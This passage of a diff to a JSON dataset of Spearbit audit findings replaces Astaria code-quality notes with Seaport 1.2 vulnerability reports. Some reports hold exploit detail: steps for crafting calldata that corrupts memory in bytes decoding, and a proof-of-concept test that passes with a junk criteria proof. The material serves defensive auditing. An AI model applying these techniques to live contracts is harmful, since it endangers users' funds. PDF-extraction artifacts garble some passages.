.connect(owner) 16 .executeMatchAdvancedOrders( zoneAddr, marketplaceContract.address, [orderOne, orderTwo], [], fulfillments, { value: parseEther(\"0.01\").add(1) } // the extra 1 wei reverts the tx ); // Decode all events and get the order hashes const orderFulfilledEvents = await decodeEvents(tx, [ { eventName: \"OrderFulfilled\", contract: marketplaceContract }, ]); expect(orderFulfilledEvents.length).to.equal(fulfillments.length); // Check that the actual order hashes match those from the events, in order const actualOrderHashes = [orderHashOne, orderHashTwo]; orderFulfilledEvents.forEach((orderFulfilledEvent, i) => expect(orderFulfilledEvent.data.orderHash).to.be.equal( actualOrderHashes[i] ) ); }); ... This bug also applies to Seaport 1.1 and PausableZone (0x004C00500000aD104D7DBd00e3ae0A5C00560C00)", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Document the role guardian plays in the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The role of guardian is not documented.", + "title": "ABI decoding for bytes: memory can be corrupted by maliciously constructing the calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the code snippet below, size can be made 0 by maliciously crafting the calldata. In this case, the free memory is not incremented. assembly { mPtrLength := mload(0x40) let size := and( add( and(calldataload(cdPtrLength), OffsetOrLengthMask), AlmostTwoWords ), OnlyFullWordMask ) calldatacopy(mPtrLength, cdPtrLength, size) mstore(0x40, add(mPtrLength, size)) } This has two different consequences: 1. If the memory offset mPtrLength is immediately used then junk values at that memory location can be interpreted as the decoded bytes type. In the case of Seaport 1.2, the likelihood of the current free memory pointing to junk value is low. So, this case has low severity. 17 2. The consequent memory allocation will also use the value mPtrLength to store data in memory. This can lead to corrupting the initial memory data. In the worst case, the next allocation can be tuned so that the first bytes data can be any arbitrary data. To make the size calculation return 0: 1. Find a function call which has bytes as a (nested) parameter. 2. Modify the calldata field where the length of the above byte is stored to the new length 0xffffe0. 3. The calculation will now return size = 0. Note: there is an additional requirement that this bytes type should be inside a dynamic struct. Otherwise, for example, in case of function foo(bytes calldata signature) , the compiler will insert a check that calldata- size is big enough to fit signature.length. Since the value 0xffffe0 is too big to be fit into calldata, such an attack is impractical. However, for bytes type inside a dynamic type, for example in function foo(bytes[] calldata signature), this check is skipped by solc (likely because it's expensive). For a practical exploit we need to look for such function. In case of Seaport 1.2 this could be the matchAdvancedOrders(AdvancedOrder[] calldata orders, ...) function. The struct AdvancedOrder has a nested parameter bytes signature as well as bytes extraData. In the above exploit one would be able to maliciously modify the calldata in such a way that Seaport would interpret the data in extraData as the signature. Here is a proof of concept for a simplified case that showcases injecting an arbitrary value into a decoded bytes. As for severity, even though interpreting calldata differently may not fundamentally break the protocol, an attacker with enough effort may be able to use this for subtle phishing attacks or as a precursor to other attacks.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "strategistFee... have not been used can be removed from the codebase.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "strategistFeeNumerator and strategistFeeDenominator are not used except in getStrategist- Fee (which itself also has not been referred to by other contracts). It looks like these have been replaced by the vault fee which gets set by public vault owners when they create the vault.", + "title": "Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport receives a collection of advanced orders to match or fulfill, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. genera- teOrder(...) can provide new consideration item recipients for this order. These new recipients are going to be used for this order from this point on. In _getGeneratedOrder, there is no comparison between old or new consideration recipients. The provided new recipients can create an issue when aggregating consideration items. Since the fulfillment data is provided beforehand by the caller of the Seaport endpoint, the caller might have provided fulfillment aggregation data that would have aggregated/combined one of the consideration items of this changed advance order with another consideration item. But the aggregation had taken into consideration the original recipient of the order in question. Multiple consideration items can only be aggregated if they share the same itemType, token, identi- fier, and recipient (ref). The new recipients provided by the contract offerer can break this invariant and in turn cause a revert.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "redeemFutureEpoch can be called directly from a public vault to avoid using the endpoint from AstariaRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "One can call the redeemFutureEpoch endpoint of the vault directly to avoid the extra gas of juggling assets and multiple contract calls when using the endpoint from AstariaRouter.", + "title": "CriteriaResolvers.criteriaProof is not validated in the identifierOrCriteria == 0 case", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the case of identifierOrCriteria == 0, the criteria resolver completely skips any validations on the Merkle proof and in particular is missing the validation that CriteriaResolvers.criteriaProof.length == 0. Note: This is also present in Seaport 1.1 and may be a known issue. Proof of concept: modified @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { test/advanced.spec.ts // Seller approves marketplace contract to transfer NFTs await set1155ApprovalForAll(seller, marketplaceContract.address, true); - - + const { root, proofs } = merkleTree([nftId]); const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))]; const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))]; const consideration = [ getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address), @@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address), ]; + - + // Add a junk criteria proof and the test still passes const criteriaResolvers = [ buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]), buildResolver(0, 0, 0, nftId, ,! [\"0xdead000000000000000000000000000000000000000000000000000000000000\"]), ]; const { order, orderHash, value } = await createOrder(", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Remove unused imports", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If an imported file is not used, it can be removed. LienToken.sol#L24 : since Base64 is only imported in this file, if not used it can be removed from the code- base.", + "title": "Calls to TypehashDirectory will be successful", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "TypehashDirectory's deployed bytecode starts with 00 which corresponds to STOP opcode (SSTORE2 also uses this pattern). This choice for the 1st bytecode causes accidental calls to the contract to succeed silently.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Reduce nesting by reverting early", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Code following this pattern: if () { } else { revert(); } can be simplified to remove nesting using custom errors: if (!) { revert(); } or if using require statements, it can be transformed into: require() ", + "title": "_isValidBulkOrderSize does not perform the signature length validation correctly.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In _isValidBulkOrderSize the signature's length validation is performed as follows: let length := mload(signature) validLength := and( lt(length, BulkOrderProof_excessSize), lt(and(sub(length, BulkOrderProof_minSize), AlmostOneWord), 2) ) The sub opcode in the above snippet wraps around. If this was the correct formula then it would actually simplify to: lt(and(sub(length, 3), AlmostOneWord), 2) The simplified and the current version would allow length to also be 3, 4, 35, 36, 67, 68 but _isValidBulkOrder- Size actually needs to check that length ( l ) has the following form: where x 2 f0, 1g and y 2 f1, 2, (cid:1) (cid:1) (cid:1) , 24g ( y represents the height/depth of the bulk order).", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "assembly can read constant global variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. For instance, highlighted code above have the following pattern: bytes32 slot = WITHDRAW_PROXY_SLOT; assembly { s.slot := slot } Here, WITHDRAW_PROXY_SLOT is a constant which can be used directly in assembly code.", + "title": "When contractNonce occupies more than 12 bytes the truncated nonce shared back with the contract offerer through ratifyOrder would be smaller than the actual stored nonce", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When contractNonce occupies more than 12 bytes the truncated nonce shared back with the con- tract offerer through ratifyOrder would be smaller than the actual stored nonce: // Write contractNonce to calldata dstHead.offset(ratifyOrder_contractNonce_offset).write( uint96(uint256(orderHash)) ); This is due to the way the contractNonce and the offerer's address are mixed in the orderHash: assembly { orderHash := or(contractNonce, shl(0x60, offerer)) }", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Revert with error messages", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are many instances of require and revert statements being used without an accompanying error message. Error messages are useful for unit tests to ensure that a call reverted due the intended reason, and helps in identifying the root cause.", + "title": "abi_decode_bytes does not mask the copied data length", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When abi_decode_bytes decodes bytes, it does not mask the copied length of the data in memory (other places where the length is masked by OffsetOrLengthMask).", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Mixed use of require and revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Astaria codebase uses a mix of require and revert statements. We suggest only following one of these ways to do conditional revert for standardization.", + "title": "OrderHash in the context of contract orders need not refer to a unique order", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In Seaport 1.1 and in Seaport 1.2 for non-contract orders, order hashes have a unique correspon- dence with the order, i.e., it can be used to identify the status of an order on-chain and track it. However, in case of contract orders, this is not the case. It is simply the current nonce of the offerer, combined with the address. This cannot be used to uniquely track an order on-chain. uint256 contractNonce; unchecked { contractNonce = _contractNonces[offerer]++; } assembly { orderHash := or(contractNonce, shl(0x60, offerer)) } Here are some example scenarios where this can be problematic: Scenario 1: A reverted contract order and the adjacent succeeding contract order will have the same order hash, regardless of whether they correspond to the same order. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Assume that this transaction failed because enough gas was not provided for the generateOrder call. This tx would revert with a custom error InvalidContrac- tOrder, generated from OrderValidator.sol#L391. 22 2. Consider Bob calling fulfilledAdvancedOrder for a different contract order with offerer = X, same smart contract offerer. OrderFulfiller.sol#L124 This order will succeed and emit the OrderFulfilled event the from In the above scenario, there are two different orders, one that reverted on-chain and the other that succeeded, both having the same orderHash despite the orders only sharing the same contract offerer--the other parameters can be completely arbitrary. Scenario 2: Contract order hashes computed off-chain can be misleading. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Alice computed the orderHash of their order off-chain by simulating the transaction, sends the transaction and polls the OrderFulfilled event with the same orderHash to know if the order has been fulfilled. 2. Consider Bob calling fulfilledAdvancedOrder for any contract order with offerer = X, the same smart contract offerer. 3. Bob's transaction gets included first. An OrderFulfilled event is emitted, with the orderHash to be the same hash that Alice computed off-chain! Alice may believe that their order succeeded. for non-contract Orders, the above approach would be valid, i.e., one may generate and sign an order, Note: compute the order hash of an order off-chain and poll for an OrderFulfilled with the order hash to know that it was fulfilled. Note: even though there is an easier way to track if the order succeeded in these cases, in the general case, Alice or Bob need not be the one executing the orders on-chain. And an off-chain agent may send misleading notifications to either parties that their order succeeded due to this quirk with contract order hashes.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "tokenURI should revert on non-existing tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "As per ERC721 standard, tokenURI() needs to revert if tokenId doesn't exist. The current code returns empty string for all inputs.", + "title": "When _contractNonces[offerer] gets updated no event is emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When _contractNonces[offerer] gets updated no event is emitted. This is in contrast to when a counter is updated. One might be able to extract the _contractNonces[offerer] (if it doesn't overflow 12 bytes to enter into the offerer region in the orderhash) from a later event when OrderFulfilled gets emited. OrderFulfilled only gets emitted for an order of CONTRACT type if the generateOrder(...)'s return data satisffies all the constraints.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Inheriting the same contract twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "VaultImplementation inherits from AstariaVaultBase (reference). Hence, there is no need to inherit AstariaVaultBase in Vault and PublicVault contract as they both inherit VaultImplementation already.", + "title": "In general a contract offerer or a zone cannot draw a conclusion accurately based on the spent offer amounts or received consideration amounts shared with them post-trasnfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When one calls one of the Seaport endpoints that fulfills or matches a collection of (advanced) orders, the used offer or consideration items will go through different modification steps in the memory. In particular, the startAmount a of these items is an important parameter to inspect: a ! a0 ! b ! a0 a : original startAmount parameter shared to Seaport by the caller encoded in the memory. a0 : the interpolated value and for orders of CONTRACT order type it is the value returned by the contract offerer (interpolation does not have an effect in this case since the startAmount and endAmount are enforced to be equal). b : must be 0 for used consideration items, otherwise the call would revert. For offer items, it can be in [0, 1) (See The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general). a0 : is the final amount shared by Seaport to either a zone for restricted orders and a contract offerer for CONTRACT order types. Offer Items For offer items, perhaps the zone or the contract offerer would like to check that the offerer has spent a maxi- mum a0 of that specific offer item. For the case of restricted orders where the zone's validateOrder(...) will be called, the offerer might end up spending more than a0 amount of a specific token with the same identifier if the collection of orders includes: A mix of open and restricted orders. Multiple zones for the same offerer, offering the same token with the same identifier. Multiple orders using the same zone. In this case, the zone might not have a sense of the orders of the transfers or which orders are included in the transaction in question (unless the contexts used by the zone enforces the exact ordering and number of items that can be matched/fulfilled in the same transaction). Note the order of transfers can be manipulated/engineered by constructing specific fulfillment data. Given a fulfillment data to combine/aggregate orders, there could be permutations of it that create different ordering of the executions. An order with an actor (a consideration recipient, contract offerer, weird token, ...) that has approval to transfer this specific offer item for the offerer in question. And when Seaport calls into (NATIVE, ERC1155 token transfers, ...) this actor, the actor would transfer the token to a different address than the offerer. There also is a special case where an order with the same offer item token and identifier is signed on a different instance of Seaport (1.0, 1.1, 1.2, ..., or other non-official versions) which an actor (a consideration recipient, con- tract offerer, weird token, ...) can cross-call into (related Cross-Seaport re-entrancy with the stateful validateOrder call). The above issue can be avoided if the offerer makes sure to not sign different transactions across different or the same instances of Seaport which 1. Share the same offer type, offer token, and offer identifier, 2. but differ in a mix of zone, and order type 24 3. can be active at a shared timestamp And/or the offerer does not give untrusted parties their token approvals. A similar issue can arise for a contract offerer if they use a mix of signed orders of non-CONTRACT order type and CONTRACT order types. Consideration Items For consideration items, perhaps the zone or the contract offerer would like to check that the recipient of each consideration item has received a minimum of a0 of that specific consideration item. This case also is similar to the offer items issues above when a mix of orders has been used.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "No need to re-cast variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Code above highlights redundant type castings. ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); ... address(msg.sender) These type castings are casting variables to the same type.", + "title": "Cross-Seaport re-entrancy with the stateful validateOrder call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The re-entrancy check in Seaport 1.2 will prevent the Zone from interacting with Seaport 1.2 again. However, an interesting scenario would happen when if the conduit has open channels to both Seaport 1.1 and Seaport 1.2 (or different deployments/forks of Seaport 1.2). This can lead to cross Seaport re-entrancy. This is not immediately problematic as Zones have limited functionality currently. But since Zones can be as flexible as possible, Zones need to be careful if they can interact with multiple versions of Seaport. Note: for Seaport 1.1's zone, the check _assertRestrictedBasicOrderValidity happens before the transfers, and it's also a staticcall. In the future, Seaport 1.3 could also have the same zone interaction, i.e., stateful calls to zones allowing for complex cross-Seaport re-entrancy between 1.2 and 1.3. Note: also see getOrderStatus and getContractOffererNonce are prone to view reentrancy for concerns around view-only re-entrancy.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Comments do not match implementation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": " Scenario 1 & 2: Comments note where each parameter ends in a packed byte array, or parameter width in bytes. The comments are outdated. Scenario 3: The unless is not implemented.", + "title": "getOrderStatus and getContractOffererNonce are prone to view reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Nonces[offerer] gets updated if there is a mix of contract offerer orders and partial orders are used, Seaport would call into the offerer contracts (let's call one of these offerer contracts X ). In turn X can be a contract that would call into other contracts (let's call them Y ) that take into consideration _orderStatus[orderHash] or _contractNonces[offerer] in their codebase by calling getOrderStatus or getContractOffererNonce The values for _orderStatus[orderHash] or _contractNonces[offerer] might get updated after Y seeks those from Seaport due to for example multiple partial orders with the same orderHash or multiple offerer contract orders using the same offerer. Therefore Y would only take into consideration the mid-flight values and not the final ones after the whole transaction with Seaport is completed.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Incomplete Natspec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": " LienToken.sol#L616 s, @return missing LienToken.sol#L738-L750 s, position, @return missing CollateralToken.sol#L616-L628 tokenId_ missing 93 VaultImplementation.sol#L153-L165 The second * on /** is missing causing the compiler to ignore the Natspec. The Natspec appears to document an old function interface. Params do not match with the function inputs. VaultImplementation.sol#L298-L310 missing stack and return vaule AstariaRouter.sol#L75-L77 @param NatSpec is missing for _WITHDRAW_IMPL, _BEACON_PROXY_IMPL and _- CLEARING_HOUSE_IMPL AstariaRouter.sol#L44-L47 : Leave a comment that AstariaRouter also acts as an IBeacon for different cloned contracts.", + "title": "The size calculation can be incorrect for large numbers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The maximum value of memory offset is defined in PointerLibraries.sol#L22 as OffsetOr- LengthMask = 0xffffffff, i.e., 232 (cid:0) 1. However, the mask OnlyFullWordMask = 0xffffe0; is defined to be a 24-bit number. Assume that the length of the bytes type where src points is 0xffffe0, then the following piece of code incorrectly computes the size as 0. function abi_encode_bytes( MemoryPointer src, MemoryPointer dst ) internal view returns (uint256 size) { unchecked { size = ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) & OnlyFullWordMask; ... This is because the constant OnlyFullWordMask does not have the two higher order bytes set (as a 32-bit type). Note: in practice, it can be difficult to construct bytes of length 0xffffe0 due to upper bound defined by the block gas limit. However, this length is still below Seaport's OffsetOrLengthMask, and therefore may be able to evade many checks. 26", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Cannot have multiple liens with same parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Lien Ids are computed by hashing the Lien struct itself. This means that no two liens can have the same parameters (e.g. same amount, rate, duration, etc.).", + "title": "_prepareBasicFulfillmentFromCalldata expands memory more than it's needed by 4 extra words", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In _prepareBasicFulfillmentFromCalldata , we have: // Update the free memory pointer so that event data is persisted. mstore(0x40, add(0x80, add(eventDataPtr, dataSize))) OrderFulfilled's event data is stored in the memory in the region [eventDataPtr, eventDataPtr + dataSize). It's important to note that eventDataPtr is an absolute memory pointer and not a relative one. So the above 4 words, 0x80, in the snippet are extra. example, For in test/basic.spec.ts the Seaport memory profile at tract.connect(buyer).fulfillBasicOrder(basicOrderParameters, {value,}) looks like: \"ERC721 <=> ETH (basic, minimal and verified on-chain)\" case the call of marketplaceCon- the end of test the in 28 0x000 23b872dd000000000000000000000000f372379f3c48ad9994b46f36f879234a ; transferFrom.selector(from, to, id) ,! 0x020 27b4556100000000000000000000000016c53175c34f67c1d4dd0878435964c1 ; ... 0x040 0000000000000000000000000000000000000000000000000000000000000440 ; free memory pointer 0x060 0000000000000000000000000000000000000000000000000000000000000000 ; ZERO slot 0x080 fa445660b7e21515a59617fcd68910b487aa5808b8abda3d78bc85df364b2c2f ; orderTypeHash 0x0a0 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; offerer 0x0c0 0000000000000000000000000000000000000000000000000000000000000000 ; zone 0x0e0 78d24b64b38e96956003ddebb880ec8c1d01f333f5a4bfba07d65d5c550a3755 ; h(ho) 0x100 81c946a4f4982cb7ed0c258f32da6098760f98eaf6895d9ebbd8f9beccb293e7 ; h(hc, ha[0], ..., ha[n]) 0x120 0000000000000000000000000000000000000000000000000000000000000000 ; orderType 0x140 0000000000000000000000000000000000000000000000000000000000000000 ; startTime 0x160 000000000000000000000000000000000000ff00000000000000000000000000 ; endTime 0x180 8f1d378d2acd9d4f5883b3b9e85385cf909e7ab825b84f5a6eba28c31ea5246a ; zoneHash > orderHash 0x1a0 00000000000000000000000016c53175c34f67c1d4dd0878435964c1c9b70db7 ; salt > fulfiller 0x1c0 0000000000000000000000000000000000000000000000000000000000000080 ; offererConduitKey > offerer array head ,! 0x1e0 0000000000000000000000000000000000000000000000000000000000000120 ; counter[offerer] > consideration array head ,! 0x200 0000000000000000000000000000000000000000000000000000000000000001 ; h[4]? > offer.length 0x220 0000000000000000000000000000000000000000000000000000000000000002 ; h[...]? > offer.itemType 0x240 000000000000000000000000c67947dc8d7fd0c2f25264f9b9313689a4ac39aa ; > offer.token 0x260 00000000000000000000000000000000c02c1411443be3c204092b54976260b9 ; > offer.identifierOrCriteria 0x280 0000000000000000000000000000000000000000000000000000000000000001 ; > offer's current interpolated amount ,! 0x2a0 0000000000000000000000000000000000000000000000000000000000000001 ; > totalConsiderationRecipients + 1 ,! 0x2c0 0000000000000000000000000000000000000000000000000000000000000000 ; > receivedItemType 0x2e0 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.token (NATIVE) 0x300 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.identifierOrCriteria ,! 0x320 0000000000000000000000000000000000000000000000000000000000000001 ; > consideration's current interpolated amount ,! 0x340 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; > offerer 0x360 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x380 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3a0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3c0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3e0 0000000000000000000000000000000000000000000000000000000000000040 ; sig.length 0x400 26aa4a333d4b615af662e63ce7006883f678068b8dc36f53f70aa79c28f2032c ; sig[ 0:31] 0x420 f640366430611c54bafd13314285f7139c85d69f423794f47ee088fc6bfbf43f ; sig[32:63] 0x440 0000000000000000000000000000000000000000000000000000000000000001 ; fulfilled = 1; // returns ,! (bool fulfilled) Notice that 4 unused memory slots. Transaction Trace This is also a good example to see that certain memory slots that previously held values like zoneHash, salt, ... have been overwritten to due to the small number of consideration items (this actually happens inside _- prepareBasicFulfillmentFromCalldata).", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Redundant unchecked can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are no arithmetic operations in these unchecked blocks. For clarity, it can be removed.", + "title": "TypehashDirectory's constructor code can be optimized.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "TypehashDirectory's deployed bytecode in its current form is: 00 3ca2711d29384747a8f61d60aad3c450405f7aaff5613541dee28df2d6986d32 ; h_00 bf8e29b89f29ed9b529c154a63038ffca562f8d7cd1e2545dda53a1b582dde30 ; h_01 53c6f6856e13104584dd0797ca2b2779202dc2597c6066a42e0d8fe990b0024d ; h_02 a02eb7ff164c884e5e2c336dc85f81c6a93329d8e9adf214b32729b894de2af1 ; h_03 39c9d33c18e050dda0aeb9a8086fb16fc12d5d64536780e1da7405a800b0b9f6 ; h_04 1c19f71958cdd8f081b4c31f7caf5c010b29d12950be2fa1c95070dc47e30b55 ; h_05 ca74fab2fece9a1d58234a274220ad05ca096a92ef6a1ca1750b9d90c948955c ; h_06 7ff98d9d4e55d876c5cfac10b43c04039522f3ddfb0ea9bfe70c68cfb5c7cc14 ; h_07 bed7be92d41c56f9e59ac7a6272185299b815ddfabc3f25deb51fe55fe2f9e8a ; h_08 d1d97d1ef5eaa37a4ee5fbf234e6f6d64eb511eb562221cd7edfbdde0848da05 ; h_09 896c3f349c4da741c19b37fec49ed2e44d738e775a21d9c9860a69d67a3dae53 ; h_10 bb98d87cc12922b83759626c5f07d72266da9702d19ffad6a514c73a89002f5f ; h_11 e6ae19322608dd1f8a8d56aab48ed9c28be489b689f4b6c91268563efc85f20e ; h_12 6b5b04cbae4fcb1a9d78e7b2dfc51a36933d023cf6e347e03d517b472a852590 ; h_13 d1eb68309202b7106b891e109739dbbd334a1817fe5d6202c939e75cf5e35ca9 ; h_14 1da3eed3ecef6ebaa6e5023c057ec2c75150693fd0dac5c90f4a142f9879fde8 ; h_15 eee9a1392aa395c7002308119a58f2582777a75e54e0c1d5d5437bd2e8bf6222 ; h_16 c3939feff011e53ab8c35ca3370aad54c5df1fc2938cd62543174fa6e7d85877 ; h_17 0efca7572ac20f5ae84db0e2940674f7eca0a4726fa1060ffc2d18cef54b203d ; h_18 5a4f867d3d458dabecad65f6201ceeaba0096df2d0c491cc32e6ea4e64350017 ; h_19 80987079d291feebf21c2230e69add0f283cee0b8be492ca8050b4185a2ff719 ; h_20 3bd8cff538aba49a9c374c806d277181e9651624b3e31111bc0624574f8bca1d ; h_21 5d6a3f098a0bc373f808c619b1bb4028208721b3c4f8d6bc8a874d659814eb76 ; h_22 1d51df90cba8de7637ca3e8fe1e3511d1dc2f23487d05dbdecb781860c21ac1c ; h_23 for height 24", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational LienToken.sol#L264," + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Argument name reuse with different meaning across contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "ken.LienActionEncumber receiver is the lender (the receiver of the LienToken)", + "title": "ConsiderationItem.recipient's absolute memory offset can be cached and reused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "ConsiderationItem.recipient's absolute offset is calculated twice in the above context.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Licensing conflict on inherited dependencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The version of Solmate contracts depended in tne gpl repository on are AGPL Licensed, making the gpl repository adopt the same license. This license is incompatible with the currently UNLICENSED Astaria related contracts.", + "title": "currentAmount can potentially be reused when storing this value in memory in _validateOrdersAnd- PrepareToFulfill", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "We have considerationItem.startAmount = currentAmount; // 1 ... mload( // 2 add( considerationItem, ReceivedItem_amount_offset ) ) From 1 where considerationItem.startAmount is assigned till 2 its value is not modifed.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The castApprovalBySig and castDisapprovalBySig functions can revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The castApprovalBySig and castDisapprovalBySig functions are used to cast an approve or disapprove via an off-chain signature. Within the _preCastAssertions a check is performed against the strategy using msg.sender instead of policy- holder, the strategy (e.g. AbsoluteStrategy) uses that argument to check if the cast sender is a policyholder. isApproval ? actionInfo.strategy.isApprovalEnabled(actionInfo, msg.sender) : actionInfo.strategy.isDisapprovalEnabled(actionInfo, msg.sender); While this works for normal cast, using the ones with signatures will fail as the sender can be anyone who calls the method with the signature signed off-chain.", + "title": "Information packed in BasicOrderType and how receivedItemType and offeredItemType are derived", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Currently the way information is packed and unpacked in/from BasicOrderType is inefficient. Basi- cOrderType is only used for BasicOrderParameters and when unpacking to give an idea how diffferent parameters are packed into this field.", "labels": [ "Spearbit", - "Llama", - "Severity: Critical Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The 